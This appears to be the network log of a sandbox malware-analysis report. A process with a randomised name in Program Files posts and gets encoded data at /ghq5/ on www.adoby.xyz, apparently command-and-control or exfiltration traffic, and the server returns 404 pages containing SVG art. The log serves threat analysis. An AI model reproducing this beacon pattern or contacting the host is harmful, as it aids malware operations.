                                                  Jul 2, 2024 14:09:01.200036049 CEST1236INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                                                  Jul 2, 2024 14:09:01.200047016 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                                                  Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                                                  Jul 2, 2024 14:09:01.200156927 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e
                                                  Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
                                                  Jul 2, 2024 14:09:01.200171947 CEST1236INData Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72
                                                  Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
                                                  Jul 2, 2024 14:09:01.200185061 CEST448INData Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72
                                                  Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
                                                  Jul 2, 2024 14:09:01.200196028 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                                  Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                                  Jul 2, 2024 14:09:01.200205088 CEST224INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                                  Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"
                                                  Jul 2, 2024 14:09:01.204955101 CEST1236INData Raw: 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20
                                                  Data Ascii: stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  27192.168.2.449764162.0.213.72801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:09:03.180546999 CEST10861OUTPOST /ghq5/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.adoby.xyz
                                                  Origin: http://www.adoby.xyz
                                                  Referer: http://www.adoby.xyz/ghq5/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Raw: 77 64 39 38 58 4a 70 3d 51 50 4c 34 6a 49 50 57 65 4d 74 70 6c 34 48 45 44 6e 62 57 48 71 36 32 6a 76 48 71 66 70 31 6e 43 50 6c 52 4a 6e 43 6c 63 37 34 41 69 50 42 2b 30 38 45 54 39 65 67 2f 70 74 6b 34 58 33 76 5a 47 4d 50 2f 44 54 31 71 4c 55 34 5a 57 52 53 2b 57 34 59 65 43 5a 2b 38 4e 49 65 42 6d 38 33 56 65 58 45 46 70 55 6c 34 67 44 7a 49 44 55 55 45 30 43 4e 52 6e 61 57 73 6b 42 59 73 4b 78 35 37 34 49 78 30 78 30 48 2f 41 79 59 77 37 72 6b 30 48 38 34 52 61 6c 4c 52 51 77 6d 41 43 72 53 72 6b 62 41 37 4b 5a 53 6c 34 54 56 6d 6e 41 78 71 74 5a 64 7a 42 38 39 6f 34 39 78 2b 4a 4a 57 76 51 75 67 70 2f 6a 47 54 4f 53 57 41 55 50 63 4d 58 52 69 48 69 47 75 4f 62 49 54 2b 2b 32 69 49 63 44 63 54 76 62 65 30 41 79 51 71 30 6d 4d 57 56 2b 34 6d 4d 56 68 6e 79 79 66 75 43 5a 4f 52 68 43 65 55 48 39 37 51 42 32 71 45 6e 45 6d 55 4f 44 42 50 53 30 61 41 34 43 31 4b 50 72 37 6d 6b 53 64 4d 33 77 63 65 54 38 7a 55 76 6f 6b 77 62 33 31 4c 7a 51 47 47 71 71 42 41 55 4f 7a 71 2f 77 72 50 32 66 77 56 43 73 [TRUNCATED]
                                                  Data Ascii: wd98XJp=QPL4jIPWeMtpl4HEDnbWHq62jvHqfp1nCPlRJnClc74AiPB+08ET9eg/ptk4X3vZGMP/DT1qLU4ZWRS+W4YeCZ+8NIeBm83VeXEFpUl4gDzIDUUE0CNRnaWskBYsKx574Ix0x0H/AyYw7rk0H84RalLRQwmACrSrkbA7KZSl4TVmnAxqtZdzB89o49x+JJWvQugp/jGTOSWAUPcMXRiHiGuObIT++2iIcDcTvbe0AyQq0mMWV+4mMVhnyyfuCZORhCeUH97QB2qEnEmUODBPS0aA4C1KPr7mkSdM3wceT8zUvokwb31LzQGGqqBAUOzq/wrP2fwVCsGZkmw2TSArjNLCuMybN4DH9sNnLc1gp8+XAqVyhpLhHcXT7htgF8oWfF/OlXRQSKqI/3jwo4bmVjjJc0HHUe1YaOtcguA67cSZTyMkCa5MP7Dd4TXibApvczdOu1pUEfSmJ0gJcDzeHFoXJQWEndHDorcb4gNFanYqLCE5/tIwJPvjdM633mnZsEv+kuHOxWd36S2ETQIwm0XzgZqBBMIphmHZmqabz1UOlRiIu5tb1I/rD2l5JENwG7pboCUeRsLq24WS9ZMHdK9trt103w9BeIWrWyuXJDvAqJgtCIutHCSsOTMKW5ieo6OFMdHeX8stYw6tz5T/3WrvF1WpQuAY32tblKS97Ic8ty/WzTDVUKXzw8kDug8u6q0vXnEgL/8qyiRmTImSHlKUgp/E77otLKFTutq8EDp08hYWCn9O8XZkzvVDX8BsPM1k4D8O8u83si3oJtUraf9zL6YWTdaW1d4gShwIbV0ATSOLphmahYmhBnb55s+MY4TVedWK4e3A59XW3WTMlIA2GyeMmBERNQKlB4EsDfaF3jn7dDyJYKfon8Y1jWkF3jioDr432XJczSNaqwOBHaIn+iDv8w/pAm0tqYYqrlETF9zVebtmjJbSglDmMHeDtV2mqEkqZVh25hu+C83q44fPSisFKJwp/Z3sOTdeS9dA [TRUNCATED]
                                                  Jul 2, 2024 14:09:03.935009003 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:09:03 GMT
                                                  Server: Apache
                                                  Content-Length: 16026
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                  Jul 2, 2024 14:09:03.935028076 CEST1236INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                                  Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
                                                  Jul 2, 2024 14:09:03.935044050 CEST1236INData Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                                  Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
                                                  Jul 2, 2024 14:09:03.935200930 CEST672INData Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
                                                  Jul 2, 2024 14:09:03.935211897 CEST1236INData Raw: 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 31 30 2e 36 31 31 22 20 79 31 3d 22 34 39 33 2e 37 31 33 22 20 78 32 3d 22 31 39 30 2e 37 33 22 20 79 32 3d 22 34 39 33 2e 37 31 33 22 20
                                                  Data Ascii: limit="10" x1="210.611" y1="493.713" x2="190.73" y2="493.713" /> </g> </g> <g id="starsSmall"> <g> <line fill="none" stroke="#0E0620" stroke-wid
                                                  Jul 2, 2024 14:09:03.935220957 CEST1236INData Raw: 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b
                                                  Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g> <g> <line fil
                                                  Jul 2, 2024 14:09:03.935230017 CEST1236INData Raw: 36 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69
                                                  Data Ascii: 6" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> </g>
                                                  Jul 2, 2024 14:09:03.935240030 CEST104INData Raw: 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 33 33 2e 33 34 33 22 20 63 79 3d 22 34 37 37 2e 30 31 34 22 20 72 3d 22
                                                  Data Ascii: cap="round" stroke-miterlimit="10" cx="133.343" cy="477.014" r="7.952" />
                                                  Jul 2, 2024 14:09:03.935811043 CEST1236INData Raw: 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20
                                                  Data Ascii: <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-lin
                                                  Jul 2, 2024 14:09:03.935868979 CEST792INData Raw: 35 32 37 2c 33 39 2e 35 30 31 2d 31 31 35 2e 33 34 2c 33 38 2e 32 31 38 63 2d 32 2e 32 38 2d 30 2e 30 34 38 2d 34 2e 39 32 36 2d 30 2e 32 34 31 2d 37 2e 38 34 31 2d 30 2e 35 34 38 0a 09 09 09 63 2d 36 38 2e 30 33 38 2d 37 2e 31 37 38 2d 31 33 34
                                                  Data Ascii: 527,39.501-115.34,38.218c-2.28-0.048-4.926-0.241-7.841-0.548c-68.038-7.178-134.288-43.963-167.33-103.87c-0.908-1.646-1.793-3.3-2.654-4.964c-18.395-35.511-37.259-83.385-32.075-118.817" /> <path id="backpack" fill="#FFFFFF" st
                                                  Jul 2, 2024 14:09:03.939924955 CEST1236INData Raw: 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20
                                                  Data Ascii: stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  28192.168.2.449765162.0.213.72801364C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 2, 2024 14:09:06.390818119 CEST496OUTGET /ghq5/?wd98XJp=dNjYg/LNb+Btw7/gHk7XSMyPk/zPSOV1YOlLUnvgSo8eic1H8Ppx0PY9ldg0aj+ffPmEFDEyAFk9JBqMQ/w/NLyeMKaPgOi3ekgmu34KkG/nLXsYy1o9wJg=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.adoby.xyz
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:09:07.025094986 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Tue, 02 Jul 2024 12:09:06 GMT
                                                  Server: Apache
                                                  Content-Length: 16026
                                                  Connection: close
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                  Jul 2, 2024 14:09:07.025111914 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37
                                                  Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.
                                                  Jul 2, 2024 14:09:07.025122881 CEST1236INData Raw: 34 36 31 2c 34 2e 36 36 38 2c 32 2e 37 30 35 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: 461,4.668,2.705,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet">
                                                  Jul 2, 2024 14:09:07.025129080 CEST1236INData Raw: 63 33 36 2e 30 36 39 2c 30 2c 36 38 2e 39 37 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e
                                                  Data Ascii: c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterli
                                                  Jul 2, 2024 14:09:07.025134087 CEST1236INData Raw: 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 33 31 30 2e 31 39
                                                  Data Ascii: h="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stro
                                                  Jul 2, 2024 14:09:07.025139093 CEST672INData Raw: 35 35 35 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d
                                                  Data Ascii: 555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g>
                                                  Jul 2, 2024 14:09:07.025247097 CEST1236INData Raw: 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b
                                                  Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="
                                                  Jul 2, 2024 14:09:07.025253057 CEST1116INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20
                                                  Data Ascii: > </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.9
                                                  Jul 2, 2024 14:09:07.025331974 CEST1236INData Raw: 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c
                                                  Data Ascii: /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width
                                                  Jul 2, 2024 14:09:07.025336027 CEST224INData Raw: 34 31 30 2e 39 36 39 63 30 2c 30 2d 35 34 2e 35 32 37 2c 33 39 2e 35 30 31 2d 31 31 35 2e 33 34 2c 33 38 2e 32 31 38 63 2d 32 2e 32 38 2d 30 2e 30 34 38 2d 34 2e 39 32 36 2d 30 2e 32 34 31 2d 37 2e 38 34 31 2d 30 2e 35 34 38 0a 09 09 09 63 2d 36
                                                  Data Ascii: 410.969c0,0-54.527,39.501-115.34,38.218c-2.28-0.048-4.926-0.241-7.841-0.548c-68.038-7.178-134.288-43.963-167.33-103.87c-0.908-1.646-1.793-3.3-2.654-4.964c-18.395-35.511-37.259-83.385-32.075-118.817" /> <pa
                                                  Jul 2, 2024 14:09:07.030148029 CEST1236INData Raw: 74 68 20 69 64 3d 22 62 61 63 6b 70 61 63 6b 22 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22
                                                  Data Ascii: th id="backpack" fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" d="M338.164,454.689l-64.726-17.353c-11.086-2.972-17.664-14.369-14.692-25.455l15.694-58.


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
